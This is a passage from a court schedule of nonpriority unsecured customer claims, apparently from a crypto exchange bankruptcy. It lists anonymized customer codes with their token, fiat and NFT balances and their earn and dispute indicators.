| 07365649 | | BRZ[1], CUSDT[4], USD[0.01] | Yes | |
| 07365651 | | USD[10.00] | | |
| 07365652 | | USD[10.00] | | |
| 07365653 | | CUSDT[1], DOGE[4589.53037802], ETH[.09314335], ETHW[.09209703], TRX[3], USD[5.73] | Yes | |
| 07365654 | | CUSDT[2], DOGE[1], TRX[3], USD[0.01] | | |
| 07365655 | | USD[10.00] | | |
| 07365656 | | USD[0.00] | | |
| 07365657 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07365658 | | USD[10.00] | | |
| 07365659 | | GRT[4.94412669], USD[0.00] | | |
| 07365660 | | USD[10.00] | | |
| 07365661 | | LTC[.05427979], USD[0.00] | Yes | |
| 07365662 | | BRZ[1], CUSDT[1], DOGE[0.36282251], TRX[.01925111], USD[0.00], YFI[.0000049] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365663 | | DOGE[2.00594977], USD[0.00] | | |
| 07365665 | | MATIC[7.266], SOL[.00244917], SUSHI[.254], USD[0.22], USDT[.007724] | | |
| 07365667 | | USD[10.00] | | |
| 07365668 | | USD[10.00] | | |
| 07365669 | Contingent, Disputed | DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07365670 | | USD[10.00] | | |
| 07365671 | | USD[10.00] | | |
| 07365672 | | CUSDT[1], DOGE[1394.38672874], TRX[2], USD[0.00] | | |
| 07365674 | | DOGE[0], USD[3.42], USDT[0] | | |
| 07365675 | | USD[10.00] | | |
| 07365676 | | BCH[0], BTC[0], CUSDT[476.32014993], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07365677 | | SOL[0] | | |
| 07365678 | | BTC[.00016074], DOGE[224.60082577], USD[0.50] | | |
| 07365679 | | TRX[1], USD[0.00] | | |
| 07365680 | | BAT[1], BRZ[2], CUSDT[4], TRX[2], USD[0.01] | | |
| 07365681 | | USD[10.00] | | |
| 07365683 | | DOGE[0], USD[0.00], USDT[0.00000091] | | |
| 07365684 | | CUSDT[1], DOGE[2710.22754775], SHIB[1733703.19001386], USD[10.00] | | |
| 07365685 | | LTC[0], SUSHI[0] | | |
| 07365686 | | USD[10.00] | | |
| 07365687 | | CUSDT[1], DOGE[327.30547369], TRX[1], USD[0.00] | | |
| 07365688 | | USD[0.20] | | |
| 07365689 | | CUSDT[2], USD[0.00] | | |
| 07365691 | | BTC[.00001691], DOGE[.00001152], TRX[7.69550644], USD[0.00] | | |
| 07365693 | | USD[10.00] | | |
| 07365694 | | USD[0.00] | | |
| 07365695 | | BAT[1], BTC[0.00013427], ETH[1.64854831], ETHW[1.64854831], GRT[.00108605], SOL[3.13728029], TRX[1.0000018], USD[0.00] | | |
| 07365696 | | USD[10.00] | | |
| 07365697 | | USD[10.00] | | |
| 07365698 | | USD[10.00] | | |
| 07365699 | | USD[10.00] | | |
| 07365700 | | USD[10.00] | | |
| 07365701 | | USD[10.00] | | |
| 07365703 | | USD[10.00] | | |
| 07365704 | | CUSDT[1], USD[0.01], USDT[1] | | |
| 07365705 | | BTC[.00260453], DOGE[165.28674424], ETH[.04191992], ETHW[.04191992], LINK[2.05239869], USD[0.16] | | |
| 07365708 | | DOGE[173.28403749], USD[0.00] | | |
| 07365710 | | BCH[0], BRZ[0], DOGE[0], TRX[0], USD[0.41], USDT[0] | Yes | |
| 07365711 | | BRZ[1], CUSDT[6], TRX[3], USD[0.00] | | |
| 07365712 | | USD[10.00] | | |
| 07365714 | | GRT[5.52751141], USD[0.00] | | |
| 07365715 | | USD[10.00] | | |
| 07365717 | | CUSDT[2], DOGE[.98274669], ETH[.05875743], ETHW[.05875743], USD[33.28] | | |
| 07365719 | | SOL[1.92239201], USD[0.00], USDT[0.00000002] | | |
| 07365720 | | USD[11.09] | Yes | |
| 07365722 | | BRZ[1], BTC[.00070038], CUSDT[1], DOGE[300.56799536], USD[6.80] | | |
| 07365727 | | DOGE[6765.41915842], LINK[19.63871626], TRX[1], USD[0.00] | | |
| 07365728 | | USD[1.42] | | |
| 07365730 | | USD[10.00] | | |
| 07365731 | | DOGE[136.9713471], USD[0.00] | | |
| 07365733 | | DOGE[30.21312428], USD[0.00] | | |
| 07365734 | | DOGE[201.67776611], USD[10.00], YFI[0] | | |
| 07365736 | | BAT[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SGD[0.00], SOL[0.00027090], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07365738 | | USD[0.00] | | |
| 07365739 | | ETH[.00000001], USDT[0] | | |
| 07365740 | | BRZ[1], CUSDT[6], TRX[2], USD[0.00] | Yes | |
| 07365741 | | DOGE[682.19694714], USD[0.00] | | |
| 07365743 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365744 | | USD[0.00] | | |
| 07365745 | | CUSDT[22.44995723], TRX[1], USD[0.00] | Yes | |
| 07365746 | | DOGE[135.01019596], USD[0.00] | | |
| 07365747 | | USD[20.00] | | |
| 07365749 | | USD[0.00] | | |
| 07365750 | | BTC[.00021193], USD[0.00] | | |
| 07365751 | | BTC[0.00567396], DOGE[.992], USD[79.50] | | |
| 07365752 | | USD[0.00] | | |
| 07365753 | | DOGE[0], USD[0.00] | | |
| 07365755 | | USD[10.00] | | |
| 07365756 | | USD[0.00] | | |
| 07365758 | | USD[10.00] | | |
| 07365759 | | BTC[.00373753], USD[2377.61] | Yes | |
| 07365760 | | BRZ[1], BTC[.00005182], DOGE[1258.59141094], ETH[.00587183], ETHW[.00587183], GBP[12.22], SOL[1.07521571], USD[0.00], USDT[.99410929] | | |
| 07365761 | | BTC[.00000013], USD[0.00] | Yes | |
| 07365764 | | CUSDT[2], DOGE[3597.96041879], USD[0.00] | | |
| 07365765 | | USD[10.00] | | |
| 07365766 | | USD[10.00] | | |
| 07365768 | Contingent, Disputed | BAT[1.01336694], BCH[0.00115061], BRZ[0.44624777], BTC[0], CUSDT[21], DAI[0], DOGE[8.29097335], ETH[0.00001732], ETHW[0.00001732], GRT[1.0080953], LINK[0.01510610], LTC[0.00002652], SHIB[1], TRX[9.87022376], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07365769 | | SOL[.005264], SUSHI[127.488], USD[0.20], USDT[131.323016] | | |
| 07365770 | | USD[0.00], USDT[0] | Yes | |
| 07365771 | | USD[10.00] | | |
| 07365774 | | BCH[0], BTC[0.00012057], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SOL[0], TRX[0], USD[0.99], USDT[0] | | |
| 07365776 | | USD[10.00] | | |
| 07365777 | | USD[10.00] | | |
| 07365779 | | BCH[0], BTC[0], DOGE[0], ETH[0], TRX[4.31693824], USD[0.00], USDT[0] | | |
| 07365780 | | DOGE[124.19994297], USD[0.00] | | |
| 07365781 | | CUSDT[1], DOGE[191.77452225], USD[0.00] | | |
| 07365782 | | USD[10.00] | | |
| 07365783 | | CUSDT[1], DOGE[1431.48250954], TRX[228.93661245], USD[0.00] | Yes | |
| 07365784 | | USD[10.00] | | |
| 07365786 | | USD[10.00] | | |
| 07365787 | | BTC[.0000645], ETH[.000704], ETHW[.000704], USD[0.00] | | |
| 07365788 | | USD[10.00] | | |
| 07365789 | | DOGE[136.04909086], USD[0.00] | | |
| 07365790 | | USD[10.00] | | |
| 07365791 | | DOGE[6.17945923], TRX[.12046696], USD[0.01] | | |
| 07365792 | | USD[10.00] | | |
| 07365793 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[15.21] | | |
| 07365794 | | USD[0.04] | | |
| 07365795 | | CUSDT[1], USD[0.00] | | |
| 07365796 | | USD[10.00] | | |
| 07365798 | | USD[10.00] | | |
| 07365800 | | DOGE[1.97474958], TRX[1], USD[565.35] | | |
| 07365802 | | USD[10.00] | | |
| 07365804 | | DOGE[1], SOL[.10662308], USD[0.00] | | |
| 07365805 | | BTC[0.00000026], CUSDT[1], DOGE[2], TRX[1], USD[32.37] | | |
| 07365806 | | USD[10.00] | | |
| 07365807 | | USD[10.00] | | |
| 07365808 | | DOGE[.0082571], TRX[1], USD[53.62] | | |
| 07365809 | | USD[10.00] | | |
| 07365810 | | AUD[0.00], AVAX[52.073], BTC[1.22462976], CAD[0.00], ETH[1.48988301], ETHW[1.48988300], EUR[0.00], GBP[0.00], LTC[13.14405], MATIC[588.65], SGD[0.00], SOL[1090.26467600], USD[-19850.17] | | |
| 07365811 | | BRZ[1], BTC[.01010939], CUSDT[3], DOGE[912.50600096], ETH[1.85746135], ETHW[1.85746135], GRT[227.21758776], LINK[3.16898899], LTC[2.35551194], TRX[960.76100465], USD[116.00], USDT[1] | | |
| 07365812 | | DOGE[680.40395076], USD[10.00] | | |
| 07365813 | | CUSDT[1], DOGE[.00002638], USD[0.00] | | |
| 07365816 | | USD[10.00] | | |
| 07365817 | | CUSDT[1], DOGE[664.69526237], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365818 | | USD[0.00] | | |
| 07365820 | | DOGE[134.43767559], USD[0.00] | Yes | |
| 07365821 | | BRZ[6.65875474], CUSDT[27], DOGE[7695.43688393], LTC[.00026056], SOL[.00001215], SUSHI[.02069208], TRX[8.19125587], USD[0.00] | Yes | |
| 07365822 | | USD[10.00] | | |
| 07365823 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07365824 | | USD[10.00] | | |
| 07365826 | | USD[31.00] | | |
| 07365827 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07365828 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07365829 | | USD[10.00] | | |
| 07365830 | | GRT[4.23649601], USD[0.00] | | |
| 07365831 | | USD[0.00] | | |
| 07365833 | | BAT[1], CUSDT[1], LINK[1], SOL[1.55106375], TRX[1], USD[0.00] | | |
| 07365834 | | USD[10.00] | | |
| 07365835 | | DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.01] | | |
| 07365837 | | CUSDT[5], KSHIB[166.72217125], SOL[.05642979], USD[0.05] | Yes | |
| 07365838 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0.00844000], SOL[0], USD[5.64], USDT[0] | | |
| 07365839 | | BAT[0], BCH[0], BTC[0], CAD[0.14], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07365840 | | USD[10.00] | | |
| 07365841 | | USD[10.00] | | |
| 07365842 | | BRZ[0], BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07365843 | | USD[10.00] | | |
| 07365844 | | CUSDT[1], USD[0.01] | | |
| 07365845 | | USD[0.01], USDT[0] | | |
| 07365847 | | USD[0.00] | | |
| 07365848 | | USD[10.00] | | |
| 07365849 | | DOGE[.0003618], USD[0.00] | | |
| 07365850 | | USD[10.00] | | |
| 07365851 | | AUD[32.03], BRZ[16.6378619], CAD[30.30], CUSDT[11], DOGE[87.48426571], EUR[20.62], GBP[17.78], GRT[38.24919423], LTC[.28501307], MATIC[9.65739678], SHIB[1466705.77882076], SOL[.28699753], SUSHI[5.31560501], TRX[6], USD[100.04] | | |
| 07365852 | | USD[10.00] | | |
| 07365853 | | BRZ[2], CUSDT[4], DOGE[1285.62827208], SHIB[13851591.97417956], TRX[.46619399], USD[0.00] | | |
| 07365854 | | USD[10.00] | | |
| 07365855 | | USD[10.00] | | |
| 07365856 | | SOL[0] | | |
| 07365857 | | USD[10.00] | | |
| 07365858 | | CUSDT[6], DOGE[0], ETH[0], ETHW[0], SUSHI[0], TRX[0], USD[0.01] | Yes | |
| 07365859 | | USD[10.00] | | |
| 07365860 | | DOGE[98.95] | | |
| 07365863 | | USD[10.00] | | |
| 07365864 | | USD[10.00] | | |
| 07365865 | | BCH[0], TRX[0], USD[0.46], USDT[0] | | |
| 07365866 | | DOGE[556.99110517], LINK[2.47527817], USD[0.00] | | |
| 07365867 | | DOGE[1], GRT[4.70945922], NFT (44293645711860998/Australia Ticket Stub #817)[1], SUSHI[68.81841143], USD[0.00] | | |
| 07365868 | | CUSDT[2], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07365869 | | USD[10.00] | | |
| 07365870 | | BAT[1.0165555], BRZ[1], BTC[.00021024], CUSDT[2], DOGE[5193.80796859], SHIB[5603667.63420375], TRX[4609.90097519], USD[0.10] | Yes | |
| 07365871 | | BAT[1], CUSDT[1], DOGE[788.27796596], USD[0.00] | | |
| 07365872 | | CUSDT[4], USD[10.34] | | |
| 07365873 | | USD[0.00] | | |
| 07365874 | | CUSDT[2], DOGE[59.93375691], TRX[1], USD[9.31] | | |
| 07365875 | | USD[10.00] | | |
| 07365876 | | BAT[2], BRZ[39.31637824], CUSDT[71.15828343], DOGE[1894.4616561], GRT[3], TRX[55.91563562], USD[0.00], USDT[1] | | |
| 07365877 | | USD[10.00] | | |
| 07365878 | | CUSDT[1], DOGE[174.7738121], USD[0.00] | | |
| 07365879 | | SOL[0], SUSHI[0], USD[7.69] | Yes | |
| 07365880 | | GRT[.219], TRX[.00133], USD[0.00], USDT[0.00000001] | | |
| 07365881 | | USD[10.00] | | |
| 07365883 | | BF_POINT[200], USD[1008.93] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365885 | | USD[10.00] | | |
| 07365886 | | TRX[2530.42028911], USD[0.00] | Yes | |
| 07365887 | | DOGE[1], USD[0.00] | | |
| 07365888 | | BRZ[2], CUSDT[3], DOGE[29134.82259064], ETH[.35392177], ETHW[.35392177], GRT[1], TRX[2], UNI[20.7493359], USD[0.00] | | |
| 07365889 | | USD[10.00] | | |
| 07365890 | | BTC[.00888431], CUSDT[2], DOGE[877.72466422], GRT[3.54137905], SOL[1.05304333], TRX[177.86310534], USD[0.00] | | |
| 07365891 | | USD[10.00] | | |
| 07365892 | | DOGE[1], UNI[0], USD[0.00] | | |
| 07365895 | | CUSDT[8], DOGE[1], TRX[1], USD[0.00] | | |
| 07365896 | | USD[10.00] | | |
| 07365899 | | USD[10.00] | | |
| 07365900 | | USD[10.00] | | |
| 07365901 | | BTC[.00019175], ETH[.00044683], ETHW[.00044683], USD[0.99], USDT[.99391067] | | |
| 07365902 | | USD[10.00] | | |
| 07365903 | | USD[10.00] | | |
| 07365904 | | USD[10.00] | | |
| 07365905 | | USD[10.00] | | |
| 07365907 | | ALGO[0], BF_POINT[100], BRZ[0], BTC[0], CUSDT[0], DOGE[0], MATIC[0], SHIB[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07365908 | | DOGE[217.51075965], LTC[.01605638], TRX[111.29531722], USD[0.00] | | |
| 07365910 | | USD[10.00] | | |
| 07365912 | | DOGE[24.59556951], USD[0.00] | | |
| 07365913 | | BTC[.00021862], CUSDT[1], USD[0.00] | | |
| 07365915 | | DOGE[.501], USD[0.00] | | |
| 07365917 | | CUSDT[2.25991166], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07365918 | Contingent, Disputed | DOGE[1], USD[0.01] | | |
| 07365919 | | BAT[1.0165555], BCH[0], BRZ[1], BTC[0], CUSDT[1], DOGE[2], LINK[24.37205067], SOL[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07365920 | | USD[10.00] | | |
| 07365921 | | USD[0.13] | Yes | |
| 07365923 | | BAT[.00004941], CAD[0.00], CUSDT[1], DOGE[.00002771], USD[23.18] | | |
| 07365924 | | USD[32.53], USDT[0.00000001] | | |
| 07365925 | | DOGE[3], USD[0.00] | | |
| 07365926 | | USD[10.00] | | |
| 07365927 | | USD[10.00] | | |
| 07365928 | | CUSDT[2], USD[0.00] | | |
| 07365929 | | TRX[1], USD[0.00], USDT[9.94606151] | | |
| 07365930 | | USD[10.00] | | |
| 07365931 | | USD[10.00] | | |
| 07365932 | | USD[10.00] | | |
| 07365933 | | USD[10.00] | | |
| 07365934 | | USD[10.00] | | |
| 07365935 | | USD[11.09] | Yes | |
| 07365936 | | ETH[.00560896], ETHW[.00560896], USD[0.00] | | |
| 07365937 | | AUD[0.00], BAT[0], BCH[0], BRZ[9.55150065], BTC[0], CAD[0.00], CUSDT[15.00007455], DOGE[89483.44277659], ETH[9.01766478], ETHW[9.01766478], EUR[0.00], GBP[0.00], GRT[0], LINK[0], LTC[0], SGD[0.00], SOL[109.59238992], SUSHI[121.96270495], TRX[1403.28220985], UNI[1], USD[0.00], USDT[1] | | |
| 07365938 | | USD[0.00] | Yes | |
| 07365939 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07365941 | | USD[10.00] | | |
| 07365942 | | AAVE[0.00006919], AVAX[.00000561], BCH[.00004239], BRZ[1.00005712], BTC[0], DOGE[3], ETH[.00000018], ETHW[0], GRT[0.00000001], KSHIB[0], LINK[23.30056413], MKR[.00002439], SHIB[6.00001904], SUSHI[.00004823], TRX[2], UNI[2.01951003], USD[0.00], USDT[0] | Yes | |
| 07365943 | | USD[10.00] | | |
| 07365944 | | USD[10.00] | | |
| 07365945 | | CUSDT[1], DOGE[150.8776949], TRX[2436.78254106], USD[0.00] | Yes | |
| 07365948 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07365949 | | USD[10.00] | | |
| 07365950 | | BTC[.00019292], CUSDT[2], DOGE[1731.81165966], USD[5.00] | | |
| 07365951 | | BCH[.09247876], BRZ[2], BTC[.0003521], CUSDT[8], DOGE[.34151826], ETH[.00909233], ETHW[.00898289], SHIB[1], TRX[5], USD[-0.14] | Yes | |
| 07365952 | | BTC[0.00002948], USD[0.01] | | |
| 07365954 | | BRZ[1], CUSDT[8], TRX[1], USD[448.87] | Yes | |
| 07365955 | | TRX[163.08185567], USD[0.00] | | |
| 07365956 | | USD[10.00] | | |

Amended Schedule F-12 Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365957 | | USD[10.00] | | |
| 07365958 | | CUSDT[1], DOGE[214.85849921], TRX[1], USD[0.00] | Yes | |
| 07365959 | | GRT[1532.657], USD[1.56] | | |
| 07365960 | | GRT[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07365961 | | DOGE[0] | | |
| 07365962 | | USD[10.00] | | |
| 07365963 | | USD[10.00] | | |
| 07365964 | | SHIB[1], USD[24.45] | Yes | |
| 07365965 | | CUSDT[3], DOGE[0], ETH[0], LTC[.00084398], SHIB[439521.18214396], TRX[0.00100926], USD[0.00], USDT[0] | Yes | |
| 07365966 | | USD[10.00] | | |
| 07365970 | | USD[10.00] | | |
| 07365971 | | BAT[0], BRZ[3], CUSDT[10], DOGE[17884.79980795], SOL[0], TRX[3303.57304890], USD[0.00], USDT[4.41733198] | Yes | |
| 07365972 | | DOGE[1], USD[0.00] | | |
| 07365975 | | CUSDT[1], DOGE[5], ETH[.00000001], ETHW[0], TRX[1], USD[0.00] | | |
| 07365976 | | BRZ[1], CUSDT[1], DOGE[3889.13142475], ETH[0], MATIC[1824.71334994], SHIB[4.05968928], SOL[16.05398511], TRX[2], USD[0.00] | Yes | |
| 07365977 | | USD[10.00] | | |
| 07365978 | | DOGE[136.64386809], USD[0.00] | | |
| 07365980 | | USD[10.00] | | |
| 07365982 | | USD[10.00] | | |
| 07365984 | | USD[0.00] | | |
| 07365985 | | USD[10.00] | | |
| 07365986 | | CUSDT[2], DOGE[4.00002039], GRT[.59874041], SHIB[18155.42812742], TRX[1], USD[0.00] | | |
| 07365987 | | USD[10.00] | | |
| 07365988 | | DOGE[68.23039356], SHIB[368052.99963194], USD[0.00] | | |
| 07365989 | | BTC[0], DOGE[3], NFT (541344484279517204/Imola Ticket Stub #527)[1], NFT (570949245829630409/FTX Crypto Cup 2022 Key #2429)[1], SHIB[0], SUSHI[0], TRX[.00000001], USD[0.00] | Yes | |
| 07365990 | | BTC[0.00368737], CUSDT[3], DOGE[121.19965324], ETH[.02424918], ETHW[.02394822], SUSHI[.00088149], TRX[1], USD[0.00] | Yes | |
| 07365991 | | USD[10.00] | | |
| 07365992 | | USD[10.00] | | |
| 07365993 | | USD[10.00] | | |
| 07365994 | | USD[10.57] | Yes | |
| 07365995 | | USD[0.01] | | |
| 07365996 | | USD[10.00] | | |
| 07365997 | | USD[10.00] | | |
| 07365998 | | USD[310.00] | | |
| 07366000 | | USD[10.00] | | |
| 07366001 | | USD[10.00] | | |
| 07366003 | | USD[10.00] | | |
| 07366004 | | BAT[4], BRZ[2], CUSDT[29], DOGE[2703.02257124], GRT[4], TRX[2517.8979592], USD[0.00], USDT[8] | | |
| 07366005 | | CUSDT[2], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07366006 | | USD[10.00] | | |
| 07366007 | | BRZ[1], CUSDT[4], TRX[1], USD[122.80] | | |
| 07366008 | | BAT[76.69881382], BRZ[1], CUSDT[55], DOGE[1], GRT[16.84021059], SHIB[1602758.10705287], SUSHI[6.1660441], TRX[1], USD[38.10] | | |
| 07366009 | | USD[10.00] | | |
| 07366011 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07366013 | | USD[0.00] | | |
| 07366014 | | CUSDT[1], DOGE[3], SOL[0], USD[0.13], USDT[0] | | |
| 07366015 | | BRZ[1], CUSDT[7], DOGE[613.95366853], TRX[3], USD[0.00] | Yes | |
| 07366017 | | USD[10.00] | | |
| 07366019 | | CUSDT[1], USD[0.00], USDT[0] | | |
| 07366020 | | BAT[.00307668], BCH[.00000269], BTC[.00000001], DOGE[.00065456], ETH[.00000035], ETHW[.0000035], GRT[.00004392], SOL[.00029997], TRX[.0003999], USD[0.00], USDT[0.00000001] | Yes | |
| 07366021 | | CUSDT[1], DOGE[63.70474029], USD[0.00], USDT[0] | | |
| 07366023 | | BRZ[1], CUSDT[19], DOGE[169.71448307], TRX[2], USD[0.23] | | |
| 07366024 | | BAT[1.01188627], BRZ[0], SOL[118.83182706], USD[10.93] | Yes | |
| 07366025 | | USD[10.00] | | |
| 07366026 | | BTC[.01845787], CUSDT[4], DOGE[3], GRT[2.00367791], SHIB[2], SOL[8.45102605], SUSHI[0], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07366027 | | ETH[.000467], ETHW[.000467], USD[59.42], USDT[0] | | |
| 07366028 | | DOGE[1], GRT[7.01728232], UNI[.7140206], USD[0.00] | | |
| 07366030 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366031 | | NFT (3455358214659153368/Entrance Voucher #2041)[1], SHIB[36995.59697265], USD[0.00] | Yes | |
| 07366033 | | GRT[10.02310465], USD[0.00] | | |
| 07366034 | | USD[0.00] | | |
| 07366035 | | USD[10.00] | | |
| 07366037 | | USD[10.00] | | |
| 07366038 | | DOGE[169.88190829], USD[0.00] | | |
| 07366039 | | CUSDT[3.5], DOGE[432.64851744], ETH[.06959165], ETHW[.06872826], KSHIB[0], LTC[1.13569923], TRX[84.00165083], USD[32.50] | Yes | |
| 07366040 | | USD[0.00] | Yes | |
| 07366042 | | CUSDT[1], DOGE[798.0296253], TRX[1], USD[0.00] | | |
| 07366043 | | USD[0.00] | | |
| 07366044 | | CUSDT[6], NFT (407539046885491307/AI-generated landscape #16)[1], NFT (499877811121270549/AI-generated landscape #18)[1], USD[0.00] | Yes | |
| 07366045 | | BRZ[4], CUSDT[10], DOGE[5], MATIC[287.64414189], SOL[0], TRX[4], USD[0.00], USDT[2.10151817] | Yes | |
| 07366046 | | BRZ[1], GRT[1.00452027], SOL[.000618], TRX[743.12498677], USD[0.00] | Yes | |
| 07366047 | | BTC[0], USD[0.00] | | |
| 07366048 | | SOL[0.00067867], USD[6.57] | Yes | |
| 07366049 | | USD[10.00] | | |
| 07366050 | | BRZ[1], CUSDT[1], DOGE[9223.09265764], USD[0.00] | | |
| 07366051 | | AAVE[0], BCH[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SHIB[107692.74950697], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | | |
| 07366052 | | TRX[183.17544525], USD[0.00] | | |
| 07366053 | | USD[10.00] | | |
| 07366054 | | USD[10.00] | | |
| 07366055 | | BTC[0], DOGE[8000], ETH[0], ETHW[0], SOL[100], USD[378.13] | | |
| 07366056 | | BAT[1.01585017], CUSDT[1], DOGE[.00859091], TRX[.59186088], USD[0.62] | Yes | |
| 07366058 | | BRZ[1], BTC[.008604], CUSDT[40], DOGE[325.91520428], ETH[.19290063], ETHW[.19268591], SHIB[681575.58110681], SUSHI[.63134407], TRX[5], USD[0.10] | Yes | |
| 07366059 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07366061 | | CUSDT[2], TRX[1], USD[10.00] | | |
| 07366062 | | USD[10.00] | | |
| 07366065 | | DOGE[162.5979246], USD[0.00] | | |
| 07366066 | | CUSDT[2], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07366067 | | USD[10.00] | | |
| 07366068 | | USD[10.00] | | |
| 07366069 | | USD[10.00] | | |
| 07366070 | | BAT[1], CUSDT[2], DOGE[3958.31443126], USD[0.00] | | |
| 07366071 | | USD[93.76] | | |
| 07366072 | | TRX[214.43333632], USD[0.00] | | |
| 07366074 | | AUD[2.55], CAD[2.50], DOGE[38.79535006], ETH[.00104507], ETHW[.00104507], LTC[.0084766], USD[0.00] | | |
| 07366075 | | USD[10.00] | | |
| 07366076 | | CUSDT[2], DOGE[115.91895661], USD[1.40] | | |
| 07366077 | | SOL[6.43344343], USD[0.00] | Yes | |
| 07366078 | | DOGE[144.06213045], USD[0.00] | | |
| 07366079 | | USDT[0.00000008] | | |
| 07366081 | | USD[0.00] | | |
| 07366083 | | CUSDT[8], TRX[3], USD[0.71] | | |
| 07366086 | | TRX[201.2109276], USD[0.00] | | |
| 07366087 | | TRX[1], USD[0.00] | | |
| 07366088 | | CUSDT[3], DOGE[958.51661960], ETH[0], SHIB[2], TRX[3], USD[0.50] | Yes | |
| 07366089 | | DOGE[.05152199], NFT (465366998393713553/dreaming of that thing)[1], SHIB[129.52644103], SOL[.0195636], USD[0.00] | Yes | |
| 07366090 | | USDT[0.00000927] | | |
| 07366091 | | BAT[2.03107607], BF_POINT[300], BRZ[5.05608865], CUSDT[7], DOGE[.11090563], ETH[0.00002579], ETHW[0.00002579], GRT[3.00426437], SHIB[.00000005], SOL[.00007932], TRX[0], USD[0.00] | Yes | |
| 07366092 | | DOGE[1], ETH[0], USD[0.00] | Yes | |
| 07366093 | | BTC[.08], USD[0.00] | | |
| 07366095 | | BAT[126.22179968], BCH[.14910308], BRZ[3], BTC[.0295299], CUSDT[27], DOGE[2578.66206037], ETH[.34217391], ETHW[.34202727], LINK[7.32280611], LTC[1.03440465], MATIC[220.73109451], SHIB[5], SOL[2.96054325], SUSHI[25.43507627], TRX[6], UNI[9.44285358], USD[2.15], YFI[.00206466] | Yes | |
| 07366096 | | USD[10.00] | | |
| 07366097 | | USD[10.00] | | |
| 07366098 | | USD[10.00] | | |
| 07366099 | | USD[20.00] | | |
| 07366100 | | USD[10.00] | | |
| 07366101 | | CUSDT[2], DOGE[.00036573], USD[0.09], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07366102 | | DOGE[3604.01724587], SHIB[7306902.46647738], TRX[4], USD[0.06] | Yes | |
| 07366105 | | SHIB[235283.71106709], SOL[0], USD[0.00] | | |
| 07366107 | | USD[10.00] | | |
| 07366108 | | USD[10.00] | | |
| 07366109 | | CUSDT[1], DOGE[.00008903], TRX[176.37810091], USD[0.21] | | |
| 07366110 | | USD[10.00] | | |
| 07366111 | | BRZ[1], CAD[0.01], CUSDT[7], DOGE[6845.59528687], GRT[50.13969055], LINK[.00498334], SOL[.62862647], TRX[5], USD[3.46], USDT[0.00027900] | | |
| 07366113 | | BAT[1.00582496], DOGE[15513.3139448], USD[2.49], USDT[0] | Yes | |
| 07366115 | | BRZ[1], CUSDT[4], TRX[1], USD[0.01] | | |
| 07366116 | | BRZ[1], DOGE[5099.82135325], USD[10.00] | | |
| 07366117 | | BRZ[3], CUSDT[14], DOGE[134.640538], ETH[.00244338], ETHW[.00241602], SHIB[10], TRX[5], USD[10.20] | Yes | |
| 07366118 | | USD[3043.76] | | |
| 07366119 | | USD[10.00] | | |
| 07366120 | | DOGE[1], TRX[69.28265861], USD[2.00] | | |
| 07366123 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07366124 | | USD[10.00] | | |
| 07366126 | | AAVE[2.31934103], CUSDT[1], DOGE[3], SOL[28.29942716], SUSHI[38.15087407], TRX[3], USD[0.00] | | |
| 07366127 | | USD[10.00] | | |
| 07366129 | | USD[10.00] | | |
| 07366130 | | EUR[8.16], USD[0.00] | | |
| 07366133 | | USD[10.00] | | |
| 07366135 | | USD[10.00] | | |
| 07366136 | | USD[10.00] | | |
